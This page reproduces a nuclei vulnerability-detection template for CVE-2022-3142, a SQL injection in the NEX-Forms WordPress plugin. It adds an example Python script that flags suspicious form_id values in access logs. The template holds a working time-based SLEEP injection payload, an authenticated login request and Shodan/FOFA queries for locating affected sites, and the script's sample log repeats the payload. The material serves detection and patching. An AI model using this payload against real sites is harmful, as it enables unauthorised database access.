nuclei | ProjectDiscovery | NUCLEI:CVE-2022-3142
Oct 17, 2023 - 7:20 a.m.

NEX-Forms Plugin < 7.9.7 - SQL Injection

2023-10-17 07:20:28
ProjectDiscovery
github.com
Tags: cve, cve2022, wpscan, packetstorm, wordpress, sqli, wp-plugin, authenticated, basixonline, sql-injection, security-vulnerability

CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS: 0.004 Low
Percentile: 73.0%

The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injection. The attack can be executed by anyone who is permitted to view the forms statistics chart. By default that is administrators only, but it can be configured otherwise via the plugin settings.

id: CVE-2022-3142

info:
  name: NEX-Forms Plugin < 7.9.7 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.
  remediation: Fixed in version 7.9.7
  reference:
    - https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/
    - https://www.exploit-db.com/exploits/51042
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3142
    - http://packetstormsecurity.com/files/171477/WordPress-NEX-Forms-SQL-Injection.html
    - https://medium.com/%40elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-3142
    cwe-id: CWE-89
    epss-score: 0.00356
    epss-percentile: 0.71515
    cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: basixonline
    product: nex-forms
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/nex-forms-express-wp-form-builder/
    fofa-query: body=/wp-content/plugins/nex-forms-express-wp-form-builder/
    publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/
  tags: cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 30s
        GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code_2 == 200'
          - 'contains(body_2, "NEX-Forms")'
          - 'contains(content_type_2, "text/html")'
        condition: and
# digest: 490a004630440220245e5b5001d840be2c17fae954a218594d722ae697e66478c6b43212bfc792d60220371c3f59d70e529a7d7cd5f8c8bcdab4416be17edcf2b5326bd3b255cb2631aa:922c64590222798bb761d5b6d8e72950
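
For defenders reviewing web server logs, the template's second request points at a simple signal: a request for the `nex-forms-dashboard` admin page whose `form_id` is not a plain integer. The following is an added example, not part of the nuclei template or the plugin; it assumes combined-format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_form_id(target):
    """Return the decoded form_id if it is not a plain integer, else None."""
    url = urlsplit(target)
    # endswith() also covers WordPress installed in a subdirectory.
    if not url.path.endswith("/wp-admin/admin.php"):
        return None
    params = parse_qs(url.query)  # decodes '+' and %XX escapes
    if "nex-forms-dashboard" not in params.get("page", []):
        return None
    for value in params.get("form_id", []):
        if not re.fullmatch(r"\d+", value.strip()):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded form_id) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            value = suspicious_form_id(match.group("target"))
            if value is not None:
                hits.append((number, value))
    return hits


# Constructed sample log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Oct/2023:07:20:28 +0000] "GET /wp-admin/admin.php'
    '?page=nex-forms-dashboard&form_id=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/Oct/2023:07:21:02 +0000] "GET /wp-admin/admin.php'
    '?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)--'
    ' HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/Oct/2023:07:21:30 +0000] "GET /wp-admin/admin.php'
    '?page=other-plugin&form_id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric form_id {value!r}")
```

A hit only shows that a non-integer `form_id` reached the dashboard page; confirm the installed plugin version and upgrade to 7.9.7 or later, as the template's remediation field states.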
